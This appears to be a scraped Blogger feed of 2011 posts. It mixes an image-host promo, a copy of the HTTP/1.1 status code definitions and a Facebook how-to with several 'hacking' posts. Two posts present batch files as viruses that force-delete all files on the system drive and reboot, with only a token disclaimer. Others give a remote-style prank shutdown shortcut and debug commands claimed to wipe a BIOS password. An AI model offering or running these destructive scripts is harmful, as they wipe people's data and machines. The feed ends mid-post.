padding-left: 0px; margin-top: 0px; margin-right: auto; margin-bottom: 0px; margin-left: auto; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; display: block; float: none; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; " /></a><em style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><strong style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; ">Unlimited uses option:</strong></em><br />There is no bandwidth limit, no storage limit, no uploading limit. No time limit, your picture will be stored until you remove them or you go against their terms and conditions.</p><p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 1.571em; margin-left: 0px; "><em style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><strong style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; ">With or without signup:</strong></em><br />To use this service you do not need to sign up but to track your galleries it is recommended.</p></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 14px; line-height: 22px; "><em style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><strong style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; ">See gallery example:</strong></em><br /><a href="http://www.galleryhosted.com/UQX2H3GZB1BG0U8">http://www.galleryhosted.com/UQX2H3GZB1BG0U8</a></span></div>Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-15136544914763928722011-04-22T00:03:00.003-07:002011-04-22T00:15:28.323-07:00HTTP/1.1: Status Code Definitions, Service Unavailable<span style="font-weight:bold;">10 Status Code Definitions</span><br />Each Status-Code is described below, including a description of which method(s) it can follow and any metainformation required in the response.<br /><span style="font-weight:bold;"><br />10.1 Informational 1xx</span><br />This class of status code indicates a provisional response, consisting only of the Status-Line and optional headers, and is terminated by an empty line. There are no required headers for this class of status code. Since HTTP/1.0 did not define any 1xx status codes, servers MUST NOT send a 1xx response to an HTTP/1.0 client except under experimental conditions.<br /><br />A client MUST be prepared to accept one or more 1xx status responses prior to a regular response, even if the client does not expect a 100 (Continue) status message. Unexpected 1xx status responses MAY be ignored by a user agent.<br /><br />Proxies MUST forward 1xx responses, unless the connection between the proxy and its client has been closed, or unless the proxy itself requested the generation of the 1xx response. (For example, if a<br /><br />proxy adds a "Expect: 100-continue" field when it forwards a request, then it need not forward the corresponding 100 (Continue) response(s).)<br />10.1.1 100 Continue<br /><br />The client SHOULD continue with its request. This interim response is used to inform the client that the initial part of the request has been received and has not yet been rejected by the server. The client SHOULD continue by sending the remainder of the request or, if the request has already been completed, ignore this response. The server MUST send a final response after the request has been completed. See section 8.2.3 for detailed discussion of the use and handling of this status code.<br /><span style="font-weight:bold;"><br />10.1.2 101 Switching Protocols</span><br />The server understands and is willing to comply with the client's request, via the Upgrade message header field (section 14.42), for a change in the application protocol being used on this connection. The server will switch protocols to those defined by the response's Upgrade header field immediately after the empty line which terminates the 101 response.<br /><br />The protocol SHOULD be switched only when it is advantageous to do so. For example, switching to a newer version of HTTP is advantageous over older versions, and switching to a real-time, synchronous protocol might be advantageous when delivering resources that use such features.<br /><br /><span style="font-weight:bold;">10.2 Successful 2xx</span><br />This class of status code indicates that the client's request was successfully received, understood, and accepted.<br /><span style="font-weight:bold;"><br />10.2.1 200 OK</span><br />The request has succeeded. The information returned with the response is dependent on the method used in the request, for example:<br /><br />GET an entity corresponding to the requested resource is sent in the response;<br /><br />HEAD the entity-header fields corresponding to the requested resource are sent in the response without any message-body;<br /><br />POST an entity describing or containing the result of the action;<br /><br />TRACE an entity containing the request message as received by the end server.<br /><br /><span style="font-weight:bold;">10.2.2 201 Created</span><br />The request has been fulfilled and resulted in a new resource being created. The newly created resource can be referenced by the URI(s) returned in the entity of the response, with the most specific URI for the resource given by a Location header field. The response SHOULD include an entity containing a list of resource characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content-Type header field. The origin server MUST create the resource before returning the 201 status code. If the action cannot be carried out immediately, the server SHOULD respond with 202 (Accepted) response instead.<br /><br />A 201 response MAY contain an ETag response header field indicating the current value of the entity tag for the requested variant just created, see section 14.19.<br /><br /><span style="font-weight:bold;">10.2.3 202 Accepted</span><br />The request has been accepted for processing, but the processing has not been completed. The request might or might not eventually be acted upon, as it might be disallowed when processing actually takes place. There is no facility for re-sending a status code from an asynchronous operation such as this.<br /><br />The 202 response is intentionally non-committal. Its purpose is to allow a server to accept a request for some other process (perhaps a batch-oriented process that is only run once per day) without requiring that the user agent's connection to the server persist until the process is completed. The entity returned with this response SHOULD include an indication of the request's current status and either a pointer to a status monitor or some estimate of when the user can expect the request to be fulfilled.<br /><br /><span style="font-weight:bold;">10.2.4 203 Non-Authoritative Information</span><br />The returned metainformation in the entity-header is not the definitive set as available from the origin server, but is gathered from a local or a third-party copy. The set presented MAY be a subset or superset of the original version. For example, including local annotation information about the resource might result in a superset of the metainformation known by the origin server. Use of this response code is not required and is only appropriate when the response would otherwise be 200 (OK).<br /><br /><span style="font-weight:bold;">10.2.5 204 No Content</span><br />The server has fulfilled the request but does not need to return an entity-body, and might want to return updated metainformation. The response MAY include new or updated metainformation in the form of entity-headers, which if present SHOULD be associated with the requested variant.<br /><br />If the client is a user agent, it SHOULD NOT change its document view from that which caused the request to be sent. This response is primarily intended to allow input for actions to take place without causing a change to the user agent's active document view, although any new or updated metainformation SHOULD be applied to the document currently in the user agent's active view.<br /><br />The 204 response MUST NOT include a message-body, and thus is always terminated by the first empty line after the header fields.<br /><br /><span style="font-weight:bold;">10.2.6 205 Reset Content</span><br />The server has fulfilled the request and the user agent SHOULD reset the document view which caused the request to be sent. This response is primarily intended to allow input for actions to take place via user input, followed by a clearing of the form in which the input is given so that the user can easily initiate another input action. The response MUST NOT include an entity.<br /><br /><span style="font-weight:bold;">10.2.7 206 Partial Content</span><br />The server has fulfilled the partial GET request for the resource. The request MUST have included a Range header field (section 14.35) indicating the desired range, and MAY have included an If-Range header field (section 14.27) to make the request conditional.<br /><br />The response MUST include the following header fields:<br /><br /> - Either a Content-Range header field (section 14.16) indicating<br /> the range included with this response, or a multipart/byteranges<br /> Content-Type including Content-Range fields for each part. If a<br /> Content-Length header field is present in the response, its<br /> value MUST match the actual number of OCTETs transmitted in the<br /> message-body.<br /><br /> - Date<br /><br /> - ETag and/or Content-Location, if the header would have been sent<br /> in a 200 response to the same request<br /><br /> - Expires, Cache-Control, and/or Vary, if the field-value might<br /> differ from that sent in any previous response for the same<br /> variant<br /><br />If the 206 response is the result of an If-Range request that used a strong cache validator (see section 13.3.3), the response SHOULD NOT include other entity-headers. If the response is the result of an If-Range request that used a weak validator, the response MUST NOT include other entity-headers; this prevents inconsistencies between cached entity-bodies and updated headers. Otherwise, the response MUST include all of the entity-headers that would have been returned with a 200 (OK) response to the same request.<br /><br />A cache MUST NOT combine a 206 response with other previously cached content if the ETag or Last-Modified headers do not match exactly, see 13.5.4.<br /><br />A cache that does not support the Range and Content-Range headers MUST NOT cache 206 (Partial) responses.<br /><br /><span style="font-weight:bold;">10.3 Redirection 3xx</span><br />This class of status code indicates that further action needs to be taken by the user agent in order to fulfill the request. The action required MAY be carried out by the user agent without interaction with the user if and only if the method used in the second request is GET or HEAD. A client SHOULD detect infinite redirection loops, since such loops generate network traffic for each redirection.<br /><br /> Note: previous versions of this specification recommended a<br /> maximum of five redirections. Content developers should be aware<br /> that there might be clients that implement such a fixed<br /> limitation.<br /><br /><span style="font-weight:bold;">10.3.1 300 Multiple Choices</span><br />The requested resource corresponds to any one of a set of representations, each with its own specific location, and agent- driven negotiation information (section 12) is being provided so that the user (or user agent) can select a preferred representation and redirect its request to that location.<br /><br />Unless it was a HEAD request, the response SHOULD include an entity containing a list of resource characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content- Type header field. Depending upon the format and the capabilities of<br /><br />the user agent, selection of the most appropriate choice MAY be performed automatically. However, this specification does not define any standard for such automatic selection.<br /><br />If the server has a preferred choice of representation, it SHOULD include the specific URI for that representation in the Location field; user agents MAY use the Location field value for automatic redirection. This response is cacheable unless indicated otherwise.<br /><span style="font-weight:bold;"><br />10.3.2 301 Moved Permanently</span><br />The requested resource has been assigned a new permanent URI and any future references to this resource SHOULD use one of the returned URIs. Clients with link editing capabilities ought to automatically re-link references to the Request-URI to one or more of the new references returned by the server, where possible. This response is cacheable unless indicated otherwise.<br /><br />The new permanent URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URI(s).<br /><br />If the 301 status code is received in response to a request other than GET or HEAD, the user agent MUST NOT automatically redirect the request unless it can be confirmed by the user, since this might change the conditions under which the request was issued.<br /><br /> Note: When automatically redirecting a POST request after<br /> receiving a 301 status code, some existing HTTP/1.0 user agents<br /> will erroneously change it into a GET request.<br /><span style="font-weight:bold;"><br />10.3.3 302 Found</span><br />The requested resource resides temporarily under a different URI. Since the redirection might be altered on occasion, the client SHOULD continue to use the Request-URI for future requests. This response is only cacheable if indicated by a Cache-Control or Expires header field.<br /><br />The temporary URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URI(s).<br /><br />If the 302 status code is received in response to a request other than GET or HEAD, the user agent MUST NOT automatically redirect the request unless it can be confirmed by the user, since this might change the conditions under which the request was issued.<br /><br /> Note: RFC 1945 and RFC 2068 specify that the client is not allowed<br /> to change the method on the redirected request. However, most<br /> existing user agent implementations treat 302 as if it were a 303<br /> response, performing a GET on the Location field-value regardless<br /> of the original request method. The status codes 303 and 307 have<br /> been added for servers that wish to make unambiguously clear which<br /> kind of reaction is expected of the client.<br /><span style="font-weight:bold;"><br />10.3.4 303 See Other</span><br />The response to the request can be found under a different URI and SHOULD be retrieved using a GET method on that resource. This method exists primarily to allow the output of a POST-activated script to redirect the user agent to a selected resource. The new URI is not a substitute reference for the originally requested resource. The 303 response MUST NOT be cached, but the response to the second (redirected) request might be cacheable.<br /><br />The different URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URI(s).<br /><br /> Note: Many pre-HTTP/1.1 user agents do not understand the 303<br /> status. When interoperability with such clients is a concern, the<br /> 302 status code may be used instead, since most user agents react<br /> to a 302 response as described here for 303.<br /><br /><span style="font-weight:bold;">10.3.5 304 Not Modified</span><br />If the client has performed a conditional GET request and access is allowed, but the document has not been modified, the server SHOULD respond with this status code. The 304 response MUST NOT contain a message-body, and thus is always terminated by the first empty line after the header fields.<br /><br />The response MUST include the following header fields:<br /><br /> - Date, unless its omission is required by section 14.18.1<br /><br />If a clockless origin server obeys these rules, and proxies and clients add their own Date to any response received without one (as already specified by [RFC 2068], section 14.19), caches will operate correctly.<br /><br /> - ETag and/or Content-Location, if the header would have been sent<br /> in a 200 response to the same request<br /><br /> - Expires, Cache-Control, and/or Vary, if the field-value might<br /> differ from that sent in any previous response for the same<br /> variant<br /><br />If the conditional GET used a strong cache validator (see section 13.3.3), the response SHOULD NOT include other entity-headers. Otherwise (i.e., the conditional GET used a weak validator), the response MUST NOT include other entity-headers; this prevents inconsistencies between cached entity-bodies and updated headers.<br /><br />If a 304 response indicates an entity not currently cached, then the cache MUST disregard the response and repeat the request without the conditional.<br /><br />If a cache uses a received 304 response to update a cache entry, the cache MUST update the entry to reflect any new field values given in the response.<br /><span style="font-weight:bold;"><br />10.3.6 305 Use Proxy</span><br />The requested resource MUST be accessed through the proxy given by the Location field. The Location field gives the URI of the proxy. The recipient is expected to repeat this single request via the proxy. 305 responses MUST only be generated by origin servers.<br /><br /> Note: RFC 2068 was not clear that 305 was intended to redirect a<br /> single request, and to be generated by origin servers only. Not<br /> observing these limitations has significant security consequences.<br /><br /><span style="font-weight:bold;">10.3.7 306 (Unused)</span><br />The 306 status code was used in a previous version of the specification, is no longer used, and the code is reserved.<br /><br /><span style="font-weight:bold;">10.3.8 307 Temporary Redirect</span><br />The requested resource resides temporarily under a different URI. Since the redirection MAY be altered on occasion, the client SHOULD continue to use the Request-URI for future requests. This response is only cacheable if indicated by a Cache-Control or Expires header field.<br /><br />The temporary URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URI(s) , since many pre-HTTP/1.1 user agents do not understand the 307 status. Therefore, the note SHOULD contain the information necessary for a user to repeat the original request on the new URI.<br /><br />If the 307 status code is received in response to a request other than GET or HEAD, the user agent MUST NOT automatically redirect the request unless it can be confirmed by the user, since this might change the conditions under which the request was issued.<br /><span style="font-weight:bold;"><br />10.4 Client Error 4xx</span><br />The 4xx class of status code is intended for cases in which the client seems to have erred. Except when responding to a HEAD request, the server SHOULD include an entity containing an explanation of the error situation, and whether it is a temporary or permanent condition. These status codes are applicable to any request method. User agents SHOULD display any included entity to the user.<br /><br />If the client is sending data, a server implementation using TCP SHOULD be careful to ensure that the client acknowledges receipt of the packet(s) containing the response, before the server closes the input connection. If the client continues sending data to the server after the close, the server's TCP stack will send a reset packet to the client, which may erase the client's unacknowledged input buffers before they can be read and interpreted by the HTTP application.<br /><br /><span style="font-weight:bold;">10.4.1 400 Bad Request</span><br />The request could not be understood by the server due to malformed syntax. The client SHOULD NOT repeat the request without modifications.<br /><br /><span style="font-weight:bold;">10.4.2 401 Unauthorized</span><br />The request requires user authentication. The response MUST include a WWW-Authenticate header field (section 14.47) containing a challenge applicable to the requested resource. The client MAY repeat the request with a suitable Authorization header field (section 14.8). If the request already included Authorization credentials, then the 401 response indicates that authorization has been refused for those credentials. If the 401 response contains the same challenge as the prior response, and the user agent has already attempted authentication at least once, then the user SHOULD be presented the entity that was given in the response, since that entity might include relevant diagnostic information. HTTP access authentication is explained in "HTTP Authentication: Basic and Digest Access Authentication" [43].<br /><span style="font-weight:bold;"><br />10.4.3 402 Payment Required</span><br />This code is reserved for future use.<br /><span style="font-weight:bold;"><br />10.4.4 403 Forbidden</span><br />The server understood the request, but is refusing to fulfill it. Authorization will not help and the request SHOULD NOT be repeated. If the request method was not HEAD and the server wishes to make public why the request has not been fulfilled, it SHOULD describe the reason for the refusal in the entity. If the server does not wish to make this information available to the client, the status code 404 (Not Found) can be used instead.<br /><span style="font-weight:bold;"><br />10.4.5 404 Not Found</span><br />The server has not found anything matching the Request-URI. No indication is given of whether the condition is temporary or permanent. The 410 (Gone) status code SHOULD be used if the server knows, through some internally configurable mechanism, that an old resource is permanently unavailable and has no forwarding address. This status code is commonly used when the server does not wish to reveal exactly why the request has been refused, or when no other response is applicable.<br /><br /><span style="font-weight:bold;">10.4.6 405 Method Not Allowed</span><br />The method specified in the Request-Line is not allowed for the resource identified by the Request-URI. The response MUST include an Allow header containing a list of valid methods for the requested resource.<br /><span style="font-weight:bold;"><br />10.4.7 406 Not Acceptable</span><br />The resource identified by the request is only capable of generating response entities which have content characteristics not acceptable according to the accept headers sent in the request.<br /><br />Unless it was a HEAD request, the response SHOULD include an entity containing a list of available entity characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content-Type header field. Depending upon the format and the capabilities of the user agent, selection of the most appropriate choice MAY be performed automatically. However, this specification does not define any standard for such automatic selection.<br /><br /> Note: HTTP/1.1 servers are allowed to return responses which are<br /> not acceptable according to the accept headers sent in the<br /> request. In some cases, this may even be preferable to sending a<br /> 406 response. User agents are encouraged to inspect the headers of<br /> an incoming response to determine if it is acceptable.<br /><br />If the response could be unacceptable, a user agent SHOULD temporarily stop receipt of more data and query the user for a decision on further actions.<br /><br />1<span style="font-weight:bold;">0.4.8 407 Proxy Authentication Required</span><br />This code is similar to 401 (Unauthorized), but indicates that the client must first authenticate itself with the proxy. The proxy MUST return a Proxy-Authenticate header field (section 14.33) containing a challenge applicable to the proxy for the requested resource. The client MAY repeat the request with a suitable Proxy-Authorization header field (section 14.34). HTTP access authentication is explained in "HTTP Authentication: Basic and Digest Access Authentication" [43].<br /><span style="font-weight:bold;"><br />10.4.9 408 Request Timeout</span><br />The client did not produce a request within the time that the server was prepared to wait. The client MAY repeat the request without modifications at any later time.<br /><br /><span style="font-weight:bold;">10.4.10 409 Conflict</span><br />The request could not be completed due to a conflict with the current state of the resource. This code is only allowed in situations where it is expected that the user might be able to resolve the conflict and resubmit the request. The response body SHOULD include enough<br /><br />information for the user to recognize the source of the conflict. Ideally, the response entity would include enough information for the user or user agent to fix the problem; however, that might not be possible and is not required.<br /><br />Conflicts are most likely to occur in response to a PUT request. For example, if versioning were being used and the entity being PUT included changes to a resource which conflict with those made by an earlier (third-party) request, the server might use the 409 response to indicate that it can't complete the request. In this case, the response entity would likely contain a list of the differences between the two versions in a format defined by the response Content-Type.<br /><br /><span style="font-weight:bold;">10.4.11 410 Gone</span><br />The requested resource is no longer available at the server and no forwarding address is known. This condition is expected to be considered permanent. Clients with link editing capabilities SHOULD delete references to the Request-URI after user approval. If the server does not know, or has no facility to determine, whether or not the condition is permanent, the status code 404 (Not Found) SHOULD be used instead. This response is cacheable unless indicated otherwise.<br /><br />The 410 response is primarily intended to assist the task of web maintenance by notifying the recipient that the resource is intentionally unavailable and that the server owners desire that remote links to that resource be removed. Such an event is common for limited-time, promotional services and for resources belonging to individuals no longer working at the server's site. It is not necessary to mark all permanently unavailable resources as "gone" or to keep the mark for any length of time -- that is left to the discretion of the server owner.<br /><br /><span style="font-weight:bold;">10.4.12 411 Length Required</span><br />The server refuses to accept the request without a defined Content- Length. The client MAY repeat the request if it adds a valid Content-Length header field containing the length of the message-body in the request message.<br /><br /><span style="font-weight:bold;">10.4.13 412 Precondition Failed</span><br />The precondition given in one or more of the request-header fields evaluated to false when it was tested on the server. This response code allows the client to place preconditions on the current resource metainformation (header field data) and thus prevent the requested method from being applied to a resource other than the one intended.<br /><span style="font-weight:bold;"><br />10.4.14 413 Request Entity Too Large</span><br />The server is refusing to process a request because the request entity is larger than the server is willing or able to process. The server MAY close the connection to prevent the client from continuing the request.<br /><br />If the condition is temporary, the server SHOULD include a Retry- After header field to indicate that it is temporary and after what time the client MAY try again.<br /><br /><span style="font-weight:bold;">10.4.15 414 Request-URI Too Long</span><br />The server is refusing to service the request because the Request-URI is longer than the server is willing to interpret. This rare condition is only likely to occur when a client has improperly converted a POST request to a GET request with long query information, when the client has descended into a URI "black hole" of redirection (e.g., a redirected URI prefix that points to a suffix of itself), or when the server is under attack by a client attempting to exploit security holes present in some servers using fixed-length buffers for reading or manipulating the Request-URI.<br /><br /><span style="font-weight:bold;">10.4.16 415 Unsupported Media Type</span><br />The server is refusing to service the request because the entity of the request is in a format not supported by the requested resource for the requested method.<br />10.4.17 416 Requested Range Not Satisfiable<br /><br />A server SHOULD return a response with this status code if a request included a Range request-header field (section 14.35), and none of the range-specifier values in this field overlap the current extent of the selected resource, and the request did not include an If-Range request-header field. (For byte-ranges, this means that the first- byte-pos of all of the byte-range-spec values were greater than the current length of the selected resource.)<br /><br />When this status code is returned for a byte-range request, the response SHOULD include a Content-Range entity-header field specifying the current length of the selected resource (see section 14.16). This response MUST NOT use the multipart/byteranges content- type.<br /><br /><span style="font-weight:bold;">10.4.18 417 Expectation Failed</span><br />The expectation given in an Expect request-header field (see section 14.20) could not be met by this server, or, if the server is a proxy, the server has unambiguous evidence that the request could not be met by the next-hop server.<br /><br /><span style="font-weight:bold;">10.5 Server Error 5xx</span><br />Response status codes beginning with the digit "5" indicate cases in which the server is aware that it has erred or is incapable of performing the request. Except when responding to a HEAD request, the server SHOULD include an entity containing an explanation of the error situation, and whether it is a temporary or permanent condition. User agents SHOULD display any included entity to the user. These response codes are applicable to any request method.<br /><br /><span style="font-weight:bold;">10.5.1 500 Internal Server Error</span><br />The server encountered an unexpected condition which prevented it from fulfilling the request.<br /><br /><span style="font-weight:bold;">10.5.2 501 Not Implemented</span><br />The server does not support the functionality required to fulfill the request. This is the appropriate response when the server does not recognize the request method and is not capable of supporting it for any resource.<br /><span style="font-weight:bold;"><br />10.5.3 502 Bad Gateway</span><br />The server, while acting as a gateway or proxy, received an invalid response from the upstream server it accessed in attempting to fulfill the request.<br /><span style="font-weight:bold;"><br />10.5.4 503 Service Unavailable</span><br />The server is currently unable to handle the request due to a temporary overloading or maintenance of the server. The implication is that this is a temporary condition which will be alleviated after some delay. If known, the length of the delay MAY be indicated in a Retry-After header. If no Retry-After is given, the client SHOULD handle the response as it would for a 500 response.<br /><br /> Note: The existence of the 503 status code does not imply that a<br /> server must use it when becoming overloaded. Some servers may wish<br /> to simply refuse the connection.<br /><br /><span style="font-weight:bold;">10.5.5 504 Gateway Timeout</span><br />The server, while acting as a gateway or proxy, did not receive a timely response from the upstream server specified by the URI (e.g. HTTP, FTP, LDAP) or some other auxiliary server (e.g. DNS) it needed to access in attempting to complete the request.<br /><br /> Note: Note to implementors: some deployed proxies are known to<br /> return 400 or 500 when DNS lookups time out.<br /><span style="font-weight:bold;"><br />10.5.6 505 HTTP Version Not Supported</span><br />The server does not support, or refuses to support, the HTTP protocol version that was used in the request message. The server is indicating that it is unable or unwilling to complete the request using the same major version as the client, as described in section 3.1, other than with this error message. The response SHOULD contain an entity describing why that version is not supported and what other protocols are supported by that server.Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-47604598630838675572011-03-30T01:57:00.004-07:002011-05-17T04:38:48.895-07:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS3OLl_E8PRqqhvX2lAwI2bZ5o_vUjZk5cBq60iCOsih5V-BCHTD43RNfZtevSPd2l7x9-TBImnPhFAh4dlHzdRjfxwIqEw3UMkyHs-Y8N3TNivXrDNme4jDvAXGFXjIA0S8LdkMWsjS1p/s1600/satyam+gupta+4brother+%252C+bangarmau+%25288%2529.jpg"><img style="cursor:pointer; cursor:hand;width: 155px; height: 200px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS3OLl_E8PRqqhvX2lAwI2bZ5o_vUjZk5cBq60iCOsih5V-BCHTD43RNfZtevSPd2l7x9-TBImnPhFAh4dlHzdRjfxwIqEw3UMkyHs-Y8N3TNivXrDNme4jDvAXGFXjIA0S8LdkMWsjS1p/s200/satyam+gupta+4brother+%252C+bangarmau+%25288%2529.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5589794596157754578" /></a>Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-58336945074202528632011-01-13T22:13:00.001-08:002011-01-13T23:03:33.705-08:00simple virus in .bat<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjphD6Kzayd8xRIQldbWRCYSgDwGqApTv8wc2iM8GBZne0ftj-xyOoRdVhJdgDGaL4V_nkjcBIsXFnOUdrUadjPHopi3sx_iQ7S-1_d2HqMi0R-gBUSfHul7odOxlzMkWv3gFbnna9EhyphenhyphenT-/s1600/computer_virus.jpg"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 200px; height: 150px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjphD6Kzayd8xRIQldbWRCYSgDwGqApTv8wc2iM8GBZne0ftj-xyOoRdVhJdgDGaL4V_nkjcBIsXFnOUdrUadjPHopi3sx_iQ7S-1_d2HqMi0R-gBUSfHul7odOxlzMkWv3gFbnna9EhyphenhyphenT-/s200/computer_virus.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5561933559804996370" /></a><br /><br /><br />use these scripts on your own responsibility..<br /><br />1.This Virus Deletes All The Content Of A Drive…<br /><br />@echo off<br />del %systemdrive%*.* /f /s /q<br />shutdown -r -f -t 00<br /><br />Save The Above Code As Anything.bat<br /><br />2.The Most Simple Virus To Crush The Window<br /><br />@Echo off<br />Del C: *.* y<br /><br />Save It As Anything.bat<br /><br />3.The below Code Will Just Restart Ur PC<br /><br />@echo off shutdown -r -f -t 00<br /><br />save as anyname.batSatyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-62950881229712278872011-01-13T22:08:00.001-08:002011-01-13T22:11:54.872-08:00How to remove Friends on Facebook ?<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVpGIMtT3-LR6g2E-76F5dvB4vxpFUt3koiEsFkVngqgcs8hArzI_MCkDKpUBWAp3ujDLTdrdVcUWCp5Hm5dcdEEkjoQ0jjS-eUqSYRiU0rgUa83TxWI98wtAP7Mc-MlEm2PHoJOGJz_9q/s1600/facebook.bmp"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 200px; height: 144px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVpGIMtT3-LR6g2E-76F5dvB4vxpFUt3koiEsFkVngqgcs8hArzI_MCkDKpUBWAp3ujDLTdrdVcUWCp5Hm5dcdEEkjoQ0jjS-eUqSYRiU0rgUa83TxWI98wtAP7Mc-MlEm2PHoJOGJz_9q/s200/facebook.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5561920308757660194" /></a><br /><br />Facebook is number 1 social-networking website in the world.You can make connect with new friend around the world on web.But when you are not happy with your any friend then you can remove that friend.Here is method how to remove friend from facebook<br /><br />1.Login to your facebook account<br /><br />2.Go to home , click on friends tab at the top of home page<br /><br />3.Then click on all connections at top of left side<br /><br />4.There you will get list of all your facebook friends<br /><br />5.To remove any friend click on the cross sign at right side of their name<br /><br />You will get an option to delete that friend or not.Then your facebook friend will be remove from your friend list.Enjoy removing facebook friend with whom you are not happy..Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-29035676383271868022011-01-13T21:59:00.001-08:002011-01-13T22:04:17.486-08:00How to Shutdown Someones Computer<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcg6Me_LZJZvphyY2jYIOkR6OmXjzrOzJa6gL4XyYcMHRV7lfA5sFDf-qYuZ5qYJLxFTrinAoyk-Jg9p7E0srXEe26gUD6WN3LaljGOc3FtEpCsdA-oUdicNSmIpxLeO-KidpRR6omOSlz/s1600/sut+down.bmp"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 316px; height: 203px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcg6Me_LZJZvphyY2jYIOkR6OmXjzrOzJa6gL4XyYcMHRV7lfA5sFDf-qYuZ5qYJLxFTrinAoyk-Jg9p7E0srXEe26gUD6WN3LaljGOc3FtEpCsdA-oUdicNSmIpxLeO-KidpRR6omOSlz/s320/sut+down.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5561918250126241522" /></a><br />Shutdown someones computer using messenger remotely??<br /><br />This is a very simple trick by which you can shutdown someone or your friend computer.Follow these simple steps to shutdown someones computer<br /><br />1. Right click on desktop, and then go New, then Shortcut.<br /><br />2. Then in the “type location of the item” type or copy this and paste at the location:<br /><br /> %windir%system32shutdown.exe -s -t 120 -c “This is a virus”<br /><br /> This is just a simple command to shutdown computer..<br /><br />3.Click to create your shortcut.<br /><br />4.DoneSatyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-77633148634626017102010-11-12T04:54:00.001-08:002010-11-12T04:54:56.792-08:00CRACK BIOS PASSWORDhere are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.<br /><br />Follow the steps below:<br /><br />1) Boot up windows.<br />2) go to dos-prompt or go to command prompt directly from the windows start up menu.<br /><br />3) type the command at the prompt: “debug” (without quotes ninja.gif )<br />4) type the following lines now exactly as given…….<br />o 70 10<br />o 71 20<br />quit<br />exit<br /><br />4) exit from the dos prompt and restart the machine<br />password protection gone!!!!!!!<br /><br />PS: I tested this in Award Bios……..<br />There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine………..<br /><br />I have not found any other trouble if the codes are used.<br />To be on safe side, just back up your data……….<br />The use of this code is entirely at ur risk……….<br />It worked fine for me……….Satyam brotherhttp://www.blogger.com/profile/09155515662924808267noreply@blogger.comtag:blogger.com,1999:blog-2632700894317861133.post-79892747738180588122010-11-12T04:48:00.002-08:002010-11-12T04:51:58.451-08:00Batch&Binary programs for formatting<span style="font-weight:bold;">Do not try it on your PC. Don’t mess around this is for educational purpose only</span><br /><br /><br />1.<br />go to notepad and type the following:<br />@Echo off<br />2. Del C:\ *.*|y save it as Dell.bat<br /><br />want worse then type the following:<br /><br />@echo off<br />del %systemdrive%\*.*/f/s/q<br />shutdown -r -f -t 00<br />and save it as a .bat file<br /><br />next,these are programs to cause system crash:<br /><br />Step 1. Copy The 